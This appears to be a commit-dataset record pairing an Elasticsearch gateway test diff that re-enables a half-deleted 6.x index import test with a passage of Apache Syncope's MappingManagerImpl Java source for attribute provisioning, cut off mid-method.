assertThat(ex.getCause().getMessage(), containsString("analyzer [test] has not been configured in mappings")); } public void testArchiveBrokenClusterSettings() throws Exception { logger.info("--> starting one node"); internalCluster().startNode(); client().prepareIndex("test").setId("1").setSource("field1", "value1").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); if (usually()) { ensureYellow(); } else { internalCluster().startNode(); client().admin().cluster() .health(Requests.clusterHealthRequest() .waitForGreenStatus() .waitForEvents(Priority.LANGUID) .waitForNoRelocatingShards(true).waitForNodes("2")).actionGet(); } ClusterState state = client().admin().cluster().prepareState().get().getState(); final Metadata metadata = state.getMetadata(); final Metadata brokenMeta = Metadata.builder(metadata).persistentSettings(Settings.builder() .put(metadata.persistentSettings()).put("this.is.unknown", true) .put(ShardLimitValidator.SETTING_CLUSTER_MAX_SHARDS_PER_NODE.getKey(), "broken").build()).build(); restartNodesOnBrokenClusterState(ClusterState.builder(state).metadata(brokenMeta)); ensureYellow("test"); // wait for state recovery state = client().admin().cluster().prepareState().get().getState(); assertEquals("true", state.metadata().persistentSettings().get("archived.this.is.unknown")); assertEquals("broken", state.metadata().persistentSettings().get("archived." + ShardLimitValidator.SETTING_CLUSTER_MAX_SHARDS_PER_NODE.getKey())); // delete these settings client().admin().cluster().prepareUpdateSettings().setPersistentSettings(Settings.builder().putNull("archived.*")).get(); state = client().admin().cluster().prepareState().get().getState(); assertNull(state.metadata().persistentSettings().get("archived.this.is.unknown")); assertNull(state.metadata().persistentSettings().get("archived." + ShardLimitValidator.SETTING_CLUSTER_MAX_SHARDS_PER_NODE.getKey())); assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); } @AwaitsFix(bugUrl = "https://github.com/elastic/elasticsearch/issues/48701") // This test relates to loading a broken state that was written by a 6.x node, but for now we do not load state from old nodes. public void testHalfDeletedIndexImport() throws Exception { // It's possible for a 6.x node to add a tombstone for an index but not actually delete the index metadata from disk since that // deletion is slightly deferred and may race against the node being shut down; if you upgrade to 7.x when in this state then the // node won't start. internalCluster().startNode(); createIndex("test", Settings.builder() .put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1) .put(IndexMetadata.SETTING_NUMBER_OF_REPLICAS, 0) .build()); ensureGreen("test"); final Metadata metadata = internalCluster().getInstance(ClusterService.class).state().metadata(); final Path[] paths = internalCluster().getInstance(NodeEnvironment.class).nodeDataPaths(); // writeBrokenMeta(metaStateService -> { // metaStateService.writeGlobalState("test", Metadata.builder(metadata) // // we remove the manifest file, resetting the term and making this look like an upgrade from 6.x, so must also reset the // // term in the coordination metadata // .coordinationMetadata(CoordinationMetadata.builder(metadata.coordinationMetadata()).term(0L).build()) // // add a tombstone but do not delete the index metadata from disk // .putCustom(IndexGraveyard.TYPE, IndexGraveyard.builder().addTombstone(metadata.index("test").getIndex()).build()).build()); // for (final Path path : paths) { // try (Stream<Path> stateFiles = Files.list(path.resolve(MetadataStateFormat.STATE_DIR_NAME))) { // for (final Path manifestPath : stateFiles // .filter(p -> p.getFileName().toString().startsWith(Manifest.FORMAT.getPrefix())).collect(Collectors.toList())) { // IOUtils.rm(manifestPath); // } // } // } // }); ensureGreen(); assertBusy(() -> assertThat(internalCluster().getInstance(NodeEnvironment.class).availableIndexFolders(), empty())); } private void restartNodesOnBrokenClusterState(ClusterState.Builder clusterStateBuilder) throws Exception { Map<String, PersistedClusterStateService> lucenePersistedStateFactories = Stream.of(internalCluster().getNodeNames()) .collect(Collectors.toMap(Function.identity(), nodeName -> internalCluster().getInstance(PersistedClusterStateService.class, nodeName))); final ClusterState clusterState = clusterStateBuilder.build(); internalCluster().fullRestart(new RestartCallback(){ @Override public Settings onNodeStopped(String nodeName) throws Exception { final PersistedClusterStateService lucenePersistedStateFactory = lucenePersistedStateFactories.get(nodeName); try (PersistedClusterStateService.Writer writer = lucenePersistedStateFactory.createWriter()) { writer.writeFullStateAndCommit(clusterState.term(), clusterState); } return super.onNodeStopped(nodeName); } }); } }
Fix test for half-deleted 6x indices import (#67587) Reenabled and fixed test that verifies that we properly cleanup after 6x leftover data.
server/src/internalClusterTest/java/org/elasticsearch/gateway/GatewayIndexStateIT.java
Fix test for half-deleted 6x indices import (#67587)
<ide><path>erver/src/internalClusterTest/java/org/elasticsearch/gateway/GatewayIndexStateIT.java <ide> import org.elasticsearch.client.Client; <ide> import org.elasticsearch.client.Requests; <ide> import org.elasticsearch.cluster.ClusterState; <add>import org.elasticsearch.cluster.coordination.CoordinationMetadata; <ide> import org.elasticsearch.cluster.metadata.IndexGraveyard; <ide> import org.elasticsearch.cluster.metadata.IndexMetadata; <ide> import org.elasticsearch.cluster.metadata.MappingMetadata; <ide> import org.elasticsearch.cluster.routing.ShardRoutingState; <ide> import org.elasticsearch.cluster.routing.UnassignedInfo; <ide> import org.elasticsearch.cluster.service.ClusterService; <add>import org.elasticsearch.common.CheckedConsumer; <ide> import org.elasticsearch.common.Priority; <ide> import org.elasticsearch.common.settings.Settings; <ide> import org.elasticsearch.common.xcontent.XContentFactory; <add>import org.elasticsearch.core.internal.io.IOUtils; <ide> import org.elasticsearch.env.NodeEnvironment; <add>import org.elasticsearch.env.NodeMetadata; <ide> import org.elasticsearch.index.mapper.MapperParsingException; <ide> import org.elasticsearch.indices.IndexClosedException; <ide> import org.elasticsearch.indices.ShardLimitValidator; <ide> assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); <ide> } <ide> <del> @AwaitsFix(bugUrl = "https://github.com/elastic/elasticsearch/issues/48701") <del> // This test relates to loading a broken state that was written by a 6.x node, but for now we do not load state from old nodes. <ide> public void testHalfDeletedIndexImport() throws Exception { <ide> // It's possible for a 6.x node to add a tombstone for an index but not actually delete the index metadata from disk since that <ide> // deletion is slightly deferred and may race against the node being shut down; if you upgrade to 7.x when in this state then the <ide> // node won't start. <ide> <del> internalCluster().startNode(); <add> final String nodeName = internalCluster().startNode(); <ide> createIndex("test", Settings.builder() <ide> .put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1) <ide> .put(IndexMetadata.SETTING_NUMBER_OF_REPLICAS, 0) <ide> <ide> final Metadata metadata = internalCluster().getInstance(ClusterService.class).state().metadata(); <ide> final Path[] paths = internalCluster().getInstance(NodeEnvironment.class).nodeDataPaths(); <del>// writeBrokenMeta(metaStateService -> { <del>// metaStateService.writeGlobalState("test", Metadata.builder(metadata) <del>// // we remove the manifest file, resetting the term and making this look like an upgrade from 6.x, so must also reset the <del>// // term in the coordination metadata <del>// .coordinationMetadata(CoordinationMetadata.builder(metadata.coordinationMetadata()).term(0L).build()) <del>// // add a tombstone but do not delete the index metadata from disk <del>// .putCustom(IndexGraveyard.TYPE, IndexGraveyard.builder().addTombstone(metadata.index("test").getIndex()).build()).build()); <del>// for (final Path path : paths) { <del>// try (Stream<Path> stateFiles = Files.list(path.resolve(MetadataStateFormat.STATE_DIR_NAME))) { <del>// for (final Path manifestPath : stateFiles <del>// .filter(p -> p.getFileName().toString().startsWith(Manifest.FORMAT.getPrefix())).collect(Collectors.toList())) { <del>// IOUtils.rm(manifestPath); <del>// } <del>// } <del>// } <del>// }); <add> final String nodeId = client().admin().cluster().prepareNodesInfo(nodeName).clear().get().getNodes().get(0).getNode().getId(); <add> <add> writeBrokenMeta(metaStateService -> { <add> for (final Path path : paths) { <add> IOUtils.rm(path.resolve(PersistedClusterStateService.METADATA_DIRECTORY_NAME)); <add> } <add> metaStateService.writeGlobalState("test", Metadata.builder(metadata) <add> // we remove the manifest file, resetting the term and making this look like an upgrade from 6.x, so must also reset the <add> // term in the coordination metadata <add> .coordinationMetadata(CoordinationMetadata.builder(metadata.coordinationMetadata()).term(0L).build()) <add> // add a tombstone but do not delete the index metadata from disk <add> .putCustom(IndexGraveyard.TYPE, IndexGraveyard.builder().addTombstone(metadata.index("test").getIndex()).build()).build()); <add> NodeMetadata.FORMAT.writeAndCleanup(new NodeMetadata(nodeId, Version.CURRENT), paths); <add> }); <ide> <ide> ensureGreen(); <ide> <ide> assertBusy(() -> assertThat(internalCluster().getInstance(NodeEnvironment.class).availableIndexFolders(), empty())); <add> } <add> <add> private void writeBrokenMeta(CheckedConsumer<MetaStateService, IOException> writer) throws Exception { <add> Map<String, MetaStateService> metaStateServices = Stream.of(internalCluster().getNodeNames()) <add> .collect(Collectors.toMap(Function.identity(), nodeName -> internalCluster().getInstance(MetaStateService.class, nodeName))); <add> internalCluster().fullRestart(new RestartCallback(){ <add> @Override <add> public Settings onNodeStopped(String nodeName) throws Exception { <add> final MetaStateService metaStateService = metaStateServices.get(nodeName); <add> writer.accept(metaStateService); <add> return super.onNodeStopped(nodeName); <add> } <add> }); <ide> } <ide> <ide> private void restartNodesOnBrokenClusterState(ClusterState.Builder clusterStateBuilder) throws Exception {
Java
apache-2.0
ad7bb3225531b0382f3625fc6d4ed197c38325ce
0
ilgrosso/syncope,apache/syncope,apache/syncope,ilgrosso/syncope,ilgrosso/syncope,ilgrosso/syncope,apache/syncope,apache/syncope
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.syncope.core.provisioning.java; import java.util.ArrayList; import java.util.Collections; import java.util.HashSet; import java.util.List; import java.util.Optional; import java.util.Set; import org.apache.commons.lang3.StringUtils; import org.apache.commons.lang3.reflect.FieldUtils; import org.apache.commons.lang3.tuple.Pair; import org.apache.syncope.common.lib.to.AnyObjectTO; import org.apache.syncope.common.lib.to.AnyTO; import org.apache.syncope.common.lib.to.AttrTO; import org.apache.syncope.common.lib.to.GroupTO; import org.apache.syncope.common.lib.to.GroupableRelatableTO; import org.apache.syncope.common.lib.to.MembershipTO; import org.apache.syncope.common.lib.to.RealmTO; import org.apache.syncope.common.lib.to.UserTO; import org.apache.syncope.common.lib.types.AttrSchemaType; import org.apache.syncope.core.persistence.api.attrvalue.validation.ParsingValidationException; import org.apache.syncope.core.persistence.api.dao.AnyObjectDAO; import org.apache.syncope.core.persistence.api.dao.AnyTypeDAO; import org.apache.syncope.core.persistence.api.dao.DerSchemaDAO; import org.apache.syncope.core.persistence.api.dao.GroupDAO; import org.apache.syncope.core.persistence.api.dao.PlainSchemaDAO; import org.apache.syncope.core.persistence.api.dao.RealmDAO; import org.apache.syncope.core.persistence.api.dao.VirSchemaDAO; import org.apache.syncope.core.persistence.api.entity.Any; import org.apache.syncope.core.persistence.api.entity.AnyUtils; import org.apache.syncope.core.persistence.api.entity.AnyUtilsFactory; import org.apache.syncope.core.persistence.api.entity.DerSchema; import org.apache.syncope.core.persistence.api.entity.EntityFactory; import org.apache.syncope.core.persistence.api.entity.GroupableRelatable; import org.apache.syncope.core.persistence.api.entity.Membership; import org.apache.syncope.core.persistence.api.entity.PlainAttr; import org.apache.syncope.core.persistence.api.entity.PlainAttrValue; import org.apache.syncope.core.persistence.api.entity.PlainSchema; import org.apache.syncope.core.persistence.api.entity.Realm; import org.apache.syncope.core.persistence.api.entity.Schema; import org.apache.syncope.core.persistence.api.entity.VirSchema; import org.apache.syncope.core.persistence.api.entity.anyobject.AnyObject; import org.apache.syncope.core.persistence.api.entity.group.Group; import org.apache.syncope.core.persistence.api.entity.resource.Item; import org.apache.syncope.core.persistence.api.entity.resource.Mapping; import org.apache.syncope.core.persistence.api.entity.resource.MappingItem; import org.apache.syncope.core.persistence.api.entity.resource.OrgUnit; import org.apache.syncope.core.persistence.api.entity.resource.OrgUnitItem; import org.apache.syncope.core.persistence.api.entity.resource.Provision; import org.apache.syncope.core.persistence.api.entity.user.UPlainAttrValue; import org.apache.syncope.core.persistence.api.entity.user.User; import org.apache.syncope.core.provisioning.api.DerAttrHandler; import org.apache.syncope.core.provisioning.api.IntAttrName; import org.apache.syncope.core.provisioning.api.MappingManager; import org.apache.syncope.core.provisioning.api.VirAttrHandler; import org.apache.syncope.core.provisioning.api.cache.VirAttrCache; import org.apache.syncope.core.provisioning.api.utils.policy.InvalidPasswordRuleConf; import org.apache.syncope.core.provisioning.java.utils.ConnObjectUtils; import org.apache.syncope.core.provisioning.java.utils.MappingUtils; import org.apache.syncope.core.spring.security.Encryptor; import org.apache.syncope.core.spring.security.PasswordGenerator; import org.identityconnectors.framework.common.FrameworkUtil; import org.identityconnectors.framework.common.objects.Attribute; import org.identityconnectors.framework.common.objects.AttributeBuilder; import org.identityconnectors.framework.common.objects.AttributeUtil; import org.identityconnectors.framework.common.objects.OperationalAttributes; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Component; import org.springframework.transaction.annotation.Transactional; import org.apache.syncope.core.provisioning.api.data.ItemTransformer; import org.identityconnectors.framework.common.objects.Name; @Component public class MappingManagerImpl implements MappingManager { private static final Logger LOG = LoggerFactory.getLogger(MappingManager.class); private static final Encryptor ENCRYPTOR = Encryptor.getInstance(); @Autowired private AnyTypeDAO anyTypeDAO; @Autowired private PlainSchemaDAO plainSchemaDAO; @Autowired private DerSchemaDAO derSchemaDAO; @Autowired private VirSchemaDAO virSchemaDAO; @Autowired private AnyObjectDAO anyObjectDAO; @Autowired private GroupDAO groupDAO; @Autowired private RealmDAO realmDAO; @Autowired private DerAttrHandler derAttrHandler; @Autowired private VirAttrHandler virAttrHandler; @Autowired private VirAttrCache virAttrCache; @Autowired private PasswordGenerator passwordGenerator; @Autowired private EntityFactory entityFactory; @Autowired private AnyUtilsFactory anyUtilsFactory; @Autowired private IntAttrNameParser intAttrNameParser; @Transactional(readOnly = true) @Override public Pair<String, Set<Attribute>> prepareAttrs( final Any<?> any, final String password, final boolean changePwd, final Boolean enable, final Provision provision) { LOG.debug("Preparing resource attributes for {} with provision {} for attributes {}", any, provision, any.getPlainAttrs()); Set<Attribute> attributes = new HashSet<>(); String connObjectKey = null; for (Item mapItem : MappingUtils.getPropagationItems(provision.getMapping().getItems())) { LOG.debug("Processing expression '{}'", mapItem.getIntAttrName()); try { Pair<String, Attribute> preparedAttr = prepareAttr(provision, mapItem, any, password); if (preparedAttr != null) { if (preparedAttr.getLeft() != null) { connObjectKey = preparedAttr.getLeft(); } if (preparedAttr.getRight() != null) { Attribute alreadyAdded = AttributeUtil.find(preparedAttr.getRight().getName(), attributes); if (alreadyAdded == null) { attributes.add(preparedAttr.getRight()); } else { attributes.remove(alreadyAdded); Set<Object> values = new HashSet<>(); if (alreadyAdded.getValue() != null && !alreadyAdded.getValue().isEmpty()) { values.addAll(alreadyAdded.getValue()); } if (preparedAttr.getRight().getValue() != null) { values.addAll(preparedAttr.getRight().getValue()); } attributes.add(AttributeBuilder.build(preparedAttr.getRight().getName(), values)); } } } } catch (Exception e) { LOG.error("Expression '{}' processing failed", mapItem.getIntAttrName(), e); } } Optional<MappingItem> connObjectKeyItem = MappingUtils.getConnObjectKeyItem(provision); if (connObjectKeyItem.isPresent()) { Attribute connObjectKeyExtAttr = AttributeUtil.find(connObjectKeyItem.get().getExtAttrName(), attributes); if (connObjectKeyExtAttr != null) { attributes.remove(connObjectKeyExtAttr); attributes.add(AttributeBuilder.build(connObjectKeyItem.get().getExtAttrName(), connObjectKey)); } Name name = MappingUtils.evaluateNAME(any, provision, connObjectKey); attributes.add(name); if (connObjectKey != null && !connObjectKey.equals(name.getNameValue()) && connObjectKeyExtAttr == null) { attributes.add(AttributeBuilder.build(connObjectKeyItem.get().getExtAttrName(), connObjectKey)); } } if (enable != null) { attributes.add(AttributeBuilder.buildEnabled(enable)); } if (!changePwd) { Attribute pwdAttr = AttributeUtil.find(OperationalAttributes.PASSWORD_NAME, attributes); if (pwdAttr != null) { attributes.remove(pwdAttr); } } return Pair.of(connObjectKey, attributes); } private String getIntValue(final Realm realm, final Item orgUnitItem) { String value = null; switch (orgUnitItem.getIntAttrName()) { case "key": value = realm.getKey(); break; case "name": value = realm.getName(); break; case "fullpath": value = realm.getFullPath(); break; default: } return value; } @Override public Pair<String, Set<Attribute>> prepareAttrs(final Realm realm, final OrgUnit orgUnit) { LOG.debug("Preparing resource attributes for {} with orgUnit {}", realm, orgUnit); Set<Attribute> attributes = new HashSet<>(); String connObjectKey = null; for (Item orgUnitItem : MappingUtils.getPropagationItems(orgUnit.getItems())) { LOG.debug("Processing expression '{}'", orgUnitItem.getIntAttrName()); String value = getIntValue(realm, orgUnitItem); if (orgUnitItem.isConnObjectKey()) { connObjectKey = value; } Attribute alreadyAdded = AttributeUtil.find(orgUnitItem.getExtAttrName(), attributes); if (alreadyAdded == null) { if (value == null) { attributes.add(AttributeBuilder.build(orgUnitItem.getExtAttrName())); } else { attributes.add(AttributeBuilder.build(orgUnitItem.getExtAttrName(), value)); } } else if (value != null) { attributes.remove(alreadyAdded); Set<Object> values = new HashSet<>(); if (alreadyAdded.getValue() != null && !alreadyAdded.getValue().isEmpty()) { values.addAll(alreadyAdded.getValue()); } values.add(value); attributes.add(AttributeBuilder.build(orgUnitItem.getExtAttrName(), values)); } } Attribute connObjectKeyExtAttr = AttributeUtil.find(orgUnit.getConnObjectKeyItem().get().getExtAttrName(), attributes); if (connObjectKeyExtAttr != null) { attributes.remove(connObjectKeyExtAttr); attributes.add( AttributeBuilder.build(orgUnit.getConnObjectKeyItem().get().getExtAttrName(), connObjectKey)); } attributes.add(MappingUtils.evaluateNAME(realm, orgUnit, connObjectKey)); return Pair.of(connObjectKey, attributes); } /** * Prepare an attribute to be sent to a connector instance. * * @param provision external resource * @param mapItem mapping item for the given attribute * @param any given any object * @param password clear-text password * @return connObjectKey + prepared attribute */ private Pair<String, Attribute> prepareAttr( final Provision provision, final Item mapItem, final Any<?> any, final String password) { IntAttrName intAttrName = intAttrNameParser.parse(mapItem.getIntAttrName(), provision.getAnyType().getKind()); boolean readOnlyVirSchema = false; Schema schema = null; AttrSchemaType schemaType = AttrSchemaType.String; if (intAttrName.getSchemaType() != null) { switch (intAttrName.getSchemaType()) { case PLAIN: schema = plainSchemaDAO.find(intAttrName.getSchemaName()); if (schema != null) { schemaType = schema.getType(); } break; case VIRTUAL: schema = virSchemaDAO.find(intAttrName.getSchemaName()); readOnlyVirSchema = (schema != null && schema.isReadonly()); break; default: } } List<PlainAttrValue> values = getIntValues(provision, mapItem, intAttrName, any); LOG.debug("Define mapping for: " + "\n* ExtAttrName " + mapItem.getExtAttrName() + "\n* is connObjectKey " + mapItem.isConnObjectKey() + "\n* is password " + mapItem.isPassword() + "\n* mandatory condition " + mapItem.getMandatoryCondition() + "\n* Schema " + intAttrName.getSchemaName() + "\n* ClassType " + schemaType.getType().getName() + "\n* Values " + values); Pair<String, Attribute> result; if (readOnlyVirSchema) { result = null; } else { List<Object> objValues = new ArrayList<>(); for (PlainAttrValue value : values) { if (FrameworkUtil.isSupportedAttributeType(schemaType.getType())) { objValues.add(value.getValue()); } else { objValues.add(value.getValueAsString(schemaType)); } } if (mapItem.isConnObjectKey()) { result = Pair.of(objValues.isEmpty() ? null : objValues.iterator().next().toString(), null); } else if (mapItem.isPassword() && any instanceof User) { String passwordAttrValue = password; if (StringUtils.isBlank(passwordAttrValue)) { User user = (User) any; if (user.canDecodePassword()) { try { passwordAttrValue = ENCRYPTOR.decode(user.getPassword(), user.getCipherAlgorithm()); } catch (Exception e) { LOG.error("Could not decode password for {}", user, e); } } else if (provision.getResource().isRandomPwdIfNotProvided()) { try { passwordAttrValue = passwordGenerator.generate(provision.getResource()); } catch (InvalidPasswordRuleConf e) { LOG.error("Could not generate policy-compliant random password for {}", user, e); } } } if (passwordAttrValue == null) { result = null; } else { result = Pair.of(null, AttributeBuilder.buildPassword(passwordAttrValue.toCharArray())); } } else if (schema != null && schema.isMultivalue()) { result = Pair.of(null, AttributeBuilder.build(mapItem.getExtAttrName(), objValues)); } else { result = Pair.of(null, objValues.isEmpty() ? AttributeBuilder.build(mapItem.getExtAttrName()) : AttributeBuilder.build(mapItem.getExtAttrName(), objValues.iterator().next())); } } return result; } @Transactional(readOnly = true) @Override public List<PlainAttrValue> getIntValues( final Provision provision, final Item mapItem, final IntAttrName intAttrName, final Any<?> any) { LOG.debug("Get internal values for {} as '{}' on {}", any, mapItem.getIntAttrName(), provision.getResource()); Any<?> reference = null; Membership<?> membership = null; if (intAttrName.getEnclosingGroup() == null && intAttrName.getRelatedAnyObject() == null) { reference = any; } if (any instanceof GroupableRelatable) { GroupableRelatable<?, ?, ?, ?, ?> groupableRelatable = (GroupableRelatable<?, ?, ?, ?, ?>) any; if (intAttrName.getEnclosingGroup() != null) { Group group = groupDAO.findByName(intAttrName.getEnclosingGroup()); if (group == null || groupableRelatable.getMembership(group.getKey()) == null) { LOG.warn("No membership for {} in {}, ignoring", intAttrName.getEnclosingGroup(), groupableRelatable); } else { reference = group; } } else if (intAttrName.getRelatedAnyObject() != null) { AnyObject anyObject = anyObjectDAO.findByName(intAttrName.getRelatedAnyObject()); if (anyObject == null || groupableRelatable.getRelationships(anyObject.getKey()).isEmpty()) { LOG.warn("No relationship for {} in {}, ignoring", intAttrName.getRelatedAnyObject(), groupableRelatable); } else { reference = anyObject; } } else if (intAttrName.getMembershipOfGroup() != null) { Group group = groupDAO.findByName(intAttrName.getMembershipOfGroup()); membership = groupableRelatable.getMembership(group.getKey()).orElse(null); } } if (reference == null) { LOG.warn("Could not determine the reference instance for {}", mapItem.getIntAttrName()); return Collections.emptyList(); } List<PlainAttrValue> values = new ArrayList<>(); boolean transform = true; AnyUtils anyUtils = anyUtilsFactory.getInstance(reference); if (intAttrName.getField() != null) { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); switch (intAttrName.getField()) { case "key": attrValue.setStringValue(reference.getKey()); values.add(attrValue); break; case "password": // ignore break; case "username": if (reference instanceof User) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(((User) reference).getUsername()); values.add(attrValue); } break; case "name": if (reference instanceof Group) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(((Group) reference).getName()); values.add(attrValue); } else if (reference instanceof AnyObject) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(((AnyObject) reference).getName()); values.add(attrValue); } break; case "userOwner": case "groupOwner": Mapping uMapping = provision.getAnyType().equals(anyTypeDAO.findUser()) ? provision.getMapping() : null; Mapping gMapping = provision.getAnyType().equals(anyTypeDAO.findGroup()) ? provision.getMapping() : null; if (reference instanceof Group) { Group group = (Group) reference; String groupOwnerValue = null; if (group.getUserOwner() != null && uMapping != null) { groupOwnerValue = getGroupOwnerValue(provision, group.getUserOwner()); } if (group.getGroupOwner() != null && gMapping != null) { groupOwnerValue = getGroupOwnerValue(provision, group.getGroupOwner()); } if (StringUtils.isNotBlank(groupOwnerValue)) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(groupOwnerValue); values.add(attrValue); } } break; default: try { attrValue.setStringValue(FieldUtils.readField( reference, intAttrName.getField(), true).toString()); values.add(attrValue); } catch (IllegalAccessException e) { LOG.error("Could not read value of '{}' from {}", intAttrName.getField(), reference, e); } } } else if (intAttrName.getSchemaType() != null) { switch (intAttrName.getSchemaType()) { case PLAIN: PlainAttr<?> attr; if (membership == null) { attr = reference.getPlainAttr(intAttrName.getSchemaName()).orElse(null); } else { attr = ((GroupableRelatable<?, ?, ?, ?, ?>) reference).getPlainAttr( intAttrName.getSchemaName(), membership).orElse(null); } if (attr != null) { if (attr.getUniqueValue() != null) { values.add(anyUtils.clonePlainAttrValue(attr.getUniqueValue())); } else if (attr.getValues() != null) { attr.getValues().forEach(value -> values.add(anyUtils.clonePlainAttrValue(value))); } } break; case DERIVED: DerSchema derSchema = derSchemaDAO.find(intAttrName.getSchemaName()); if (derSchema != null) { String value = membership == null ? derAttrHandler.getValue(reference, derSchema) : derAttrHandler.getValue(reference, membership, derSchema); if (value != null) { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); attrValue.setStringValue(value); values.add(attrValue); } } break; case VIRTUAL: // virtual attributes don't get transformed transform = false; VirSchema virSchema = virSchemaDAO.find(intAttrName.getSchemaName()); if (virSchema != null) { LOG.debug("Expire entry cache {}-{}", reference, intAttrName.getSchemaName()); virAttrCache.expire( reference.getType().getKey(), reference.getKey(), intAttrName.getSchemaName()); List<String> virValues = membership == null ? virAttrHandler.getValues(reference, virSchema) : virAttrHandler.getValues(reference, membership, virSchema); virValues.stream(). map(value -> { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); attrValue.setStringValue(value); return attrValue; }). forEachOrdered(attrValue -> values.add(attrValue)); } break; default: } } LOG.debug("Internal values: {}", values); List<PlainAttrValue> transformed = values; if (transform) { for (ItemTransformer transformer : MappingUtils.getItemTransformers(mapItem)) { transformed = transformer.beforePropagation(mapItem, any, transformed); } LOG.debug("Transformed values: {}", values); } else { LOG.debug("No transformation occurred"); } return transformed; } private String getGroupOwnerValue(final Provision provision, final Any<?> any) { Pair<String, Attribute> preparedAttr = prepareAttr(provision, MappingUtils.getConnObjectKeyItem(provision).get(), any, null); String connObjectKey = preparedAttr.getKey(); return MappingUtils.evaluateNAME(any, provision, connObjectKey).getNameValue(); } @Transactional(readOnly = true) @Override public Optional<String> getConnObjectKeyValue(final Any<?> any, final Provision provision) { MappingItem mapItem = provision.getMapping().getConnObjectKeyItem().get(); List<PlainAttrValue> values = getIntValues( provision, mapItem, intAttrNameParser.parse(mapItem.getIntAttrName(), provision.getAnyType().getKind()), any); return Optional.ofNullable(values.isEmpty() ? null : values.get(0).getValueAsString()); } @Transactional(readOnly = true) @Override public String getConnObjectKeyValue(final Realm realm, final OrgUnit orgUnit) { OrgUnitItem orgUnitItem = orgUnit.getConnObjectKeyItem().get(); return getIntValue(realm, orgUnitItem); } @Transactional(readOnly = true) @Override public void setIntValues(final Item mapItem, final Attribute attr, final AnyTO anyTO, final AnyUtils anyUtils) { List<Object> values = null; if (attr != null) { values = attr.getValue(); for (ItemTransformer transformer : MappingUtils.getItemTransformers(mapItem)) { values = transformer.beforePull(mapItem, anyTO, values); } } values = values == null ? Collections.emptyList() : values; IntAttrName intAttrName = intAttrNameParser.parse(mapItem.getIntAttrName(), anyUtils.getAnyTypeKind()); if (intAttrName.getField() != null) { switch (intAttrName.getField()) { case "password": if (anyTO instanceof UserTO && !values.isEmpty()) { ((UserTO) anyTO).setPassword(ConnObjectUtils.getPassword(values.get(0))); } break; case "username": if (anyTO instanceof UserTO) { ((UserTO) anyTO).setUsername(values.isEmpty() || values.get(0) == null ? null : values.get(0).toString()); } break; case "name": if (anyTO instanceof GroupTO) { ((GroupTO) anyTO).setName(values.isEmpty() || values.get(0) == null ? null : values.get(0).toString()); } else if (anyTO instanceof AnyObjectTO) { ((AnyObjectTO) anyTO).setName(values.isEmpty() || values.get(0) == null ? null : values.get(0).toString()); } break; case "userOwner": case "groupOwner": if (anyTO instanceof GroupTO && attr != null) { // using a special attribute (with schema "", that will be ignored) for carrying the // GroupOwnerSchema value AttrTO attrTO = new AttrTO(); attrTO.setSchema(StringUtils.EMPTY); if (values.isEmpty() || values.get(0) == null) { attrTO.getValues().add(StringUtils.EMPTY); } else { attrTO.getValues().add(values.get(0).toString()); } ((GroupTO) anyTO).getPlainAttrs().add(attrTO); } break; default: } } else if (intAttrName.getSchemaType() != null) { GroupableRelatableTO groupableTO = null; Group group = null; if (anyTO instanceof GroupableRelatableTO && intAttrName.getMembershipOfGroup() != null) { groupableTO = (GroupableRelatableTO) anyTO; group = groupDAO.findByName(intAttrName.getMembershipOfGroup()); } switch (intAttrName.getSchemaType()) { case PLAIN: AttrTO attrTO = new AttrTO(); attrTO.setSchema(intAttrName.getSchemaName()); PlainSchema schema = plainSchemaDAO.find(intAttrName.getSchemaName()); for (Object value : values) { AttrSchemaType schemaType = schema == null ? AttrSchemaType.String : schema.getType(); if (value != null) { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); switch (schemaType) { case String: attrValue.setStringValue(value.toString()); break; case Binary: attrValue.setBinaryValue((byte[]) value); break; default: try { attrValue.parseValue(schema, value.toString()); } catch (ParsingValidationException e) { LOG.error("While parsing provided value {}", value, e); attrValue.setStringValue(value.toString()); schemaType = AttrSchemaType.String; } break; } attrTO.getValues().add(attrValue.getValueAsString(schemaType)); } } if (groupableTO == null || group == null) { anyTO.getPlainAttrs().add(attrTO); } else { Optional<MembershipTO> membership = groupableTO.getMembership(group.getKey()); if (!membership.isPresent()) { membership = Optional.of( new MembershipTO.Builder().group(group.getKey(), group.getName()).build()); groupableTO.getMemberships().add(membership.get()); } membership.get().getPlainAttrs().add(attrTO); } break; case DERIVED: attrTO = new AttrTO(); attrTO.setSchema(intAttrName.getSchemaName()); if (groupableTO == null || group == null) { anyTO.getDerAttrs().add(attrTO); } else { Optional<MembershipTO> membership = groupableTO.getMembership(group.getKey()); if (!membership.isPresent()) { membership = Optional.of( new MembershipTO.Builder().group(group.getKey(), group.getName()).build()); groupableTO.getMemberships().add(membership.get()); } membership.get().getDerAttrs().add(attrTO); } break; case VIRTUAL: attrTO = new AttrTO(); attrTO.setSchema(intAttrName.getSchemaName()); // virtual attributes don't get transformed, iterate over original attr.getValue() if (attr != null && attr.getValue() != null && !attr.getValue().isEmpty()) { attr.getValue().stream(). filter(value -> value != null). forEachOrdered(value -> attrTO.getValues().add(value.toString())); } if (groupableTO == null || group == null) { anyTO.getVirAttrs().add(attrTO); } else { Optional<MembershipTO> membership = groupableTO.getMembership(group.getKey()); if (!membership.isPresent()) { membership = 